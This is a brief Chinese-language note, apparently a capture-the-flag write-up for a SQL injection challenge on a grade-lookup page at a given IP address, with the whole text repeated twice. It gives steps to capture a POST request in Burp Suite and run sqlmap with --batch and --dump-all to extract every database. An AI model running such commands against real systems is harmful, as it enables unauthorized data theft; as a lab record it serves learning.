http://120.24.86.145:8002/chengjidan/index.php
注入通过post提交id查询。
1.使用burpSuite拦截post包,复制下数据包为a.txt
2.sqlmap -r a.txt -p 参数 --batch 默认选择 --dump-all 直接爆破所有
例如
sqlmap -r a.txt -p username --batch --dump-all
http://120.24.86.145:8002/chengjidan/index.php
注入通过post提交id查询。
1.使用burpSuite拦截post包,复制下数据包为a.txt
2.sqlmap -r a.txt -p 参数 --batch 默认选择 --dump-all 直接爆破所有
例如
sqlmap -r a.txt -p username --batch --dump-all